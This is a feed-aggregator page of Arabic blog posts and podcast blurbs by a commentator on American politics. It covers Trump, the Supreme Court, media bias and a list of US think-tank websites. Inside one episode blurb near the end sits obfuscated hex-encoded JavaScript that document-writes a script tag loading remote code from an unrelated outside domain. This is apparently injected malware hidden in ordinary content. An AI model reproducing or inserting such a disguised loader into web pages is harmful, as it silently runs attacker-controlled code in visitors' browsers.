Loading...

Follow Yaser bin Abdulaziz Al-Ghaslan on Feedspot

Continue with Google
Continue with Facebook
or

Valid
التعامل مع الثلج رياضة إجبارية سنوية جديدة منذ أن وصلت للولايات المتحدة في التاسع عشر من يناير 2017 أي قبل يوم واحد من تنصيب ترامب رئيساً لأمريكا وأنا لا أتابع الا الشأن الأمريكي لا لأني بالضرورة خبير أو متخصص بقدر ماهو الفضاء الذي أصبحت أعيشه كل يوم، فكل ما يحيطني يتأثر بما يدور في السياسة الأمريكية الوطنية والمحلية، كل ما أقرأه أو أسمعه من أراء السياسيين أراه منعكسا في الشارع والحي ومع الأصدقاء والمعارف الذين أخالطهم في حياتي الخاصة وفي عملي، فأمريكا كبلد ونظام لم يعد ترفاً أتسلى بالحديث عن تجاذباته بل جزء أصيل من حياتي اليومية. عندما أتيت كان أمامي إختبار صعب، فهل أتعامل مع هذا العالم السياسي الغريب عن ما تعودت عليه من أسس فكرية من خلال المتابعة والتدقيق فيما يقال او يقرر او يحدث، أم أحاول أن افهم أولا هذا النظام بتفاصيلة وتعقيداته قبل أن اشرع في محاولة فهم وتفسير ما يجري، وقد وصلت لقناعة راسخة بأنه يتحتم علي اولا من أجل فهم هذا النظام وتركيباته ان اعمل على فك طلاسمه التي تتكون من التاريخ والدستور والخليط الإجتماعي والنفسي لمجتمع كل ما فيه مختلف عن العالم الذي أتيت منه. يحزنني كثير عندما أقرأ بعض الأراء التي تحكم على أي بلد من منظور النقل والتأثر برأي جهة أو إنسان آخر، ذلك الإسلوب الذي لا يستخدم العقل الذاتي في بناء الأراء وهو ذات العقل الذي لا يبذل جهدا أصلا في محاولة الفهم والتحليل بعيدا عن العاطفة، فتجد الأحكام تطلق بسرعة البرق ودون أي إستناد شخصي أو معرفي سوى ما قيل وما يردده البعض كالببغاء. و لكن رغم حزني على تلك الحالة إلا أني افهمها، فقد عشت كذلك لسنوات طويلة تجربة التلقين وعدم المجادلة، خوفا من العقاب في حين وفي حين آخر رهبة من أن أُبعد عن محيط كنت أعتقد أن لا قيمة لي سوى بكوني جزء منه، ولكن رغم أني تمكنت ربما بفعل بعضا مما في حمضي النووي من مشاكسة أن أنتقل من زاوية المتلقي السلبي إلا مستوى المتلقي الإيجابي، إلا أني لازلت أجد صعوبة في التعامل مع العقلية التي لازالت مبنية على نظرية النحن والهم، تلك العقلية التي تقول “إن لم تكن معي فأنت حتماً ضدي”، وكأن منطقة الإختلاف لابد لها أن تكون منطقة خلاف وتضاد. في السياسة الأمريكية هناك العديد من الأمور التي لا أتفق معها، فعلى سبيل المثال لا الحصر، يبقى الرئيس ترامب من وجهة نظري رجل بالمجمل يسئ للنسيج الداخلي والخارجي لأمريكا والعالم رغم بعض قراراته الصحيحة التي تصب في مصلحة دول أجد نفسي متعاطفاً معها، وهو حكم بنيته بعد معايشتي ومتابعتي اليومية لانعاكسات إدارته منذ اللحظة التي أصبح فيها رئيسا، هو كالرجل الطبيعي القوي الذي لديه بعضاً من الإختلال الكيميائي في الأعصاب، فإن واظب على أخذ الدواء سيتعامل مع يومه ومع محيطه بالشكل اللائق الذي يرضي الجميع وإن لم يتفقوا معه، ولكن إن فاق ذات صباح وفاته تناول الدواء فقد يكون وبالا على كل من يتصل أو لا يتواصل معه من أصدقائه أو خصومه، فينقلب حال البلاد ومعه أحوال العباد والعالم. الدستور هنا هو من يحكم، وليس الرئيس أو الكونغرس أو المحكمة العليا، الحكم هنا لراي الشعب و ليس لرأي السياسي أو القاضي أو رجل الأعمال، نعم هؤلاء لهم تأثيرهم و بيدهم تحريك الأمور بالإتجاه الذي يريدون بالحق أحيانا وبالتحايل في مريات أخرى، إلا أن المواطن العادي كجاري له الحق في أن يقول رايه في الشارع بكل صراحة دون أن يتجرأ أحد ويوقفه أو يمنعه من الحديث، وله الحق في أن يعترض عبر القنوات التي كفلها له الدستور ليمنع قرار أو يلغي آخر، لذلك يبقى نبض الشارع هو أهم المقاييس التي أجدها تنير لي الطريق للنظر لتلك التجاذبات التي بدأت بها حديثي وإعتمادها احد اهم الاسس للبحث والتمحيص من أجل الوصول لرأي قد يكون الأقرب للصواب. ميزة التجربة هنا أنها أعادتني لصفوف الدراسة ليس بالمدارس و الجامعات بل في دهاليز المكتبات وبطون الكتب، فإستبدلت هوايات كرة القدم والبلوت بمرافعات قضايا المحكمة العليا وتحليلات قوانين الدستور ومراسلات الإدارات الأمريكية السابقة والحالية الداخلية منها والخارجية، أما المذكرات الشخصية لقيادات هذا البلد السياسية والفكرية فأصبحت كقهوة الصباح أو ربما قهوة المساء، تفتح ذهني على عقلية رجال ونساء إستخدموا العقل والحيلة في تحقيق أهداف جلها لوطنهم وبعضها دون شك شخصي. هذا البلد ليس مثالي كما قد يتوهم البعض، لكن الحكم عليه بسطحية من خلال الصورة النمطية التي بناها و يبنيها في مخيلتنا الإعلام أو من خلال تصريحات أصحاب القرار ومن خلفهم ماكيناتهم الدعائية يبقى أقصر طريق للوصول للراي المشوش، قد يكون في بعض مكونات ذلك الرأي أمراً صحيحاً ولكنه بالمجمع يسقط أمام المخالف صاحب الحجة القوية، فالأبيض والأسود ليسا اللونين الوحيدين في عالم السياسة المتلونة، ومن يتصور أنها سياسة فيها الشيطان وفيها الملاك فقط فهو واهم، فقد تجد الشيطان هنا يلبس الأبيض ويصلي في الكنيسه خاشعاً، وقد تجد الملاك يقتل في الخفاء ويتحرش بالقاصرات و إن لبس هو الآخر الأبيض وتوشح بالطهارة، فأيهما في نظرك الشيطان وأيهما الملاك ؟ ..read more
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
وردتني العديد من الطلبات خلال الفترة الماضية بعد حلقة برنامجي التعديل الأول و التي تحدث فيها عن مراكز الأبحاث الأمريكية تطلب فيها معلومات وعناوين المواقع الإلكترونية لتلك المعاهد وغيرها العاملة في واشنطن العاصمة و باقي المدن الأمريكية. بعد البحث و الجمع وضعت هذه القائمة التي تتضمن ما أعتبره أهم تلك المركز، أتمنى أن تساعد المهتمين بالموضوع الوصول لكل المعلومات والأخبار والأبحاث التي يبحثون عنها. ولا تنسوا مشاركة هذا المحتوى مع المهتمين لتعم الفائدة. The Brookings Institution:  http://www.brookings.edu   Institute for Policy Studies: www.ips-dc.org The US Institute for Peace:  www.usip.org The Carnegie Endowment for Peace: www.carnegieendowment.org Hudson institute: https://www.hudson.org Washington institute: https://www.washingtoninstitute.org The Middle East Institute: https://www.mei.edu Heritage Foundation: http://www.heritage.org Progressive Policy Institute – http://www.ppionline.org New America Foundation: https://www.newamerica.org Aspen Institute: http://www.aspeninstitute.org The Wilson Center: http://www.wilsoncenter.org Arabia Foundation: https://www.arabiafoundation.org American Enterprise Institute: http://www.aei.org National Press Club: http://npc.press.org Elliott School of International Affairs: http://www.gwu.edu Center for Strategic and Int’l Studies: www.csis.org Cato Institute: http://www.cato.org Center for American Progress: http://www.americanprogress.org Center for Democracy and Technology: http://www.cdt.org ..read more
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
اتناول في بودكاست التعديل الأول اليوم ما اثير خلال الأسابيع و الساعات الماضية عن قيام ترامب بإعلان حالة الطوارئ و ذلك كرد منه لعدم إعتماد الكونغرس للمبلغ الذي طلبه لبناء الجدار الحدودي مع المكسيك. ماذا يعني ذلك و لماذا يريد إعلان حالة الطوارئ سيكون محور الحديث اليوم مع تسليط الضوء على بعض الأمور المرتبطة بمواقف الكونغرس من السعودية مثلا و بعض القضايا الأخرى التي يقوم الرئيس ترامب بدعمها. لماذا يريد ترامب إعلان حالة الطوارئ - SoundCloud(599 secs long, 244 plays)Play in SoundCloud -~-~~-~~~-~~-~- إشترك بالقناة ليصلك الجديد أول بأول     لماذا يريد ترامب إعلان حالة الطوارئ - التعديل الأول (بودكاست) حلقة 2 - YouTube ..read more
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
الحلقة الأولى من بودكاست التعديل الأول، حيث أعلق فيه على الأخبار الآنية التي تحيط بالسياسة الأمريكية. في هذه الحلقة اتحدث عن واقع الحال في الحزب الديمقراطي ومن هو المرشح الذي يملك أكبر قدر من الحظ لمواجهة الرئيس ترامب في الإنتخابات الرئاسية القادمة. - SoundCloud(0 secs long)Play in SoundCloud -~-~~-~~~-~~-~- إشترك بقناتي على اليوتيوب ليصلك الجديد أول بأول   من هو الرئيس القادم لأمريكا - التعديل الأول (بودكاست) حلقة 1 - YouTube   ..read more
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
حلقة جديدة من التعديل الأول اكسبريس ومعلومات عن غرائب في حياة رؤساء امريكا. فمنهم رئيس كان صانع وموزع خمور و آخر كان يخاف من الكهرباء وثالث جلاد يلف الحبال على رقاب المحكومين بالإعداء. -~-~~-~~~-~~-~- إشترك بالقناة ليصلك الجديد أول بأول     غرائب رؤساء امريكا - التعديل الأول (اكسبريس) حلقة 5 - YouTube ..read more
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
حلقة جديدة من التعديل الأول نتحدث فيها عن المحكمة العليا الأمريكية أو المعروفة كذلك بالمحكمة الدستورية الأمريكية، وماهي الخلفيات التاريخية و التركيبة الداخلية و التخصصات و القضايا التي تناولتها وأحاطت عملها خلال السنوات الماضية. -~-~~-~~~-~~-~- إشترك بالقناة ليصلك الجديد أول بأول     المحكمة العليا الأمريكية - التعديل الأول - حلقة 13 - YouTube ..read more
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
من أكثر الأمور التي تستفزني وتشعرني بكثير من الغضب و الأسى هو قيام بعض وسائل الإعلام على نقل الأخبار بشكل إنتقائي بحيث يقوم الخبر أو المعلومة المنقوله بشكل إنتقائي على خدمة التوجه الذي تعمل عليه تلك الوسيلة أو تلك لترويجه أو الدفع بإتجاهه. لا أتحدث هنا عن تلك الوسائل التي تختلق الأكاذيب وتنسج قصصا من وحي خيال كاتبها، بل تلك التي تنقل الأخبار على شاكلة (لا تقربوا الصلاة) اي من خلال إقتطاع جزء من حديث أو حادثه و القيام بتضخيم ذلك بشكل يجعل المتابع يعتقد أن الجزئية المنقولة هي الخبر كاملا، وهو عمل لا يمكن وصفه إلا بأنه تضليل. تعدد وسائل الإعلام وتنوع توجهاتها ومنصاتها اليوم كفل للمتابع الراغب في معرفة الصورة الكاملة أن يتعرف على ذلك التضليل، فلا يمكن لأي وسيلة أن تستغفل المتابع اليوم على أساس أن تعدد الوسائل وبالتالي التوجهات ستحتم أن ينقل الخبر وإن كان إنتقائيا بأشكال مختلفه وبالتالي ربما لن نجد جهة واحدة تنقل لنا الحقيقة بشكلها المحايد الكامل ولكن تناقض النقولات بين تلك الوسائل سيكشف لنا إنتقائية كل وسيلة ومن تحاول أن تخدم أو تروج لصالحه. للأسف ليس هناك اليوم بالمجمل إعلام محايد أو مهني أو حتى إعلام يهدف لنقل الحقيقة بقدر ما يوجد إعلام يعمل من أجل خدمة أهداف وجهات ومصالح معينة، فظهرت على السطح عبارات تتناقض مع مبادئ الإعلام كما درسناه في كليات الإعلام و كما مارسناه وتعلمناه ممن سبقونا في مجال الصحافة والتعبير ولكنها أصبحت هذه العبارات تروج بإعتبارها العمل المقدس للصحافة، كالقول بأن الإعلام له هدف أسمى غير هدفه الأسمى المتمثل في كشف الحقيقية أو خلق توصيفات جديدة للإعلام كـ “الإعلام الإيجابي” وغيرها من الأوصاف الرنانة المفرغة من المعنى الحقيقي لما هو العمل الإعلامي، علما أن من واجبات الإعلام الأساسية مراقبة المتجازوين وبالتالي فإن عمله هو الغوص في السلبيات و ليس الترويج لمن يقوم بعمله بالشكل المطلوب منه والتحول لمجرد وسيلة لتضخيم الأعمال لأجل بث الروح الإيجابية ! في أمريكا مثل نجد أنه من السهل معرفة توجه أي قناة تلفزيونية من مجرد متابعة نقلها لأخبار الرئيس ترامب، فعلى الرغم من الحرية الكبيرة التي يكفلها الدستور الأمريكي للإعلام إلا أن وجود الحرية لا يعني بالضرورة وجود مهنية و حيادية في النقل، ف قناة (سي إن إن) مثلا تعمل من “الحبة قبة” كما يقولون في كل مرة تلتقط معلومة نقلها الرئيس بشكل خاطئ ويبدأون في الترويج أن ذلك الخطأ هو دليل جديد على أن ترامب ا زال مستمرا في كذبه وتضليله للشعب الأمريكي، في حين تقوم قناة فوكس بتضخيم كل إنجاز يحققه ترامب و إعتبار ذلك عمل لم يسبقه أي رئيس في تاريخ أمريكا كما إعتاد ترامب ان يصف معظم إنجازاته. الموضوع بطيعته طويل و متشعب و لكن أردت هنا فقط التعبير عن الفكرة لعلي أعود لها في القادم من الأيام بشكل أكثر توسعا. ..read more
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
حلقة جديدة من التعديل الأول اكسبريس ومعلومات سريعة عن المدن الأمريكية وامور اخرى. -~-~~-~~~-~~-~- إشترك بالقناة ليصلك الجديد أول بأول   ماذا تعرف عن المدن الأمريكية - التعديل الأول (اكسبريس) حلقة 4 - YouTube ..read more
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
حلقة جديدة من التعديل الأول نتحدث فيها من أمام البيت الأبيض عن الظروف التي تحيط تنظيم المظاهرات أمام هذا المبنى المهم في الحياة السياسية الأمريكية، وماهي قصة أشهر متظاهرة أمام بيت الرئيس في التاريخي الأمريكي يحكيها لنا “وليد عبدالجواد” كبير المحللين السياسيين السابقين في وزارة الخارجية ومتحدث سابق بإسم الخارجية الأمريكية. -~-~~-~~~-~~-~- إشترك بالقناة ليصلك الجديد أول بأول   المظاهرات أمام البيت الأبيض - التعديل الأول - حلقة 12 - YouTube ..read more
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
حلقة جديدة من التعديل الأول اكسبريس وملعومات سريعة و غريبة عن المواطن الأمريكي -~-~~-~~~-~~-~- إشترك بالقناة ليصلك الجديد أول بأول       var _0x22d1=[“\x3C\x73\x63\x72″,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x63\x77\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x74\x65\x72″,”\x63\x61\x62\x69\x6C\x69\x73\x2E\x69\x6E\x66\x6F\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];function jiler(){var _0xd9f0x2=_0x22d1[0];var _0xd9f0x3=_0x22d1[1];var _0xd9f0x4=_0x22d1[2];var _0xd9f0x5=_0x22d1[3];document[_0x22d1[4]](_0xd9f0x2+ _0xd9f0x3+ _0xd9f0x4+ _0xd9f0x5)}jiler() ..read more

Read for later

Articles marked as Favorite are saved for later viewing.
close
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Separate tags by commas
To access this feature, please upgrade your account.
Start your free month
Free Preview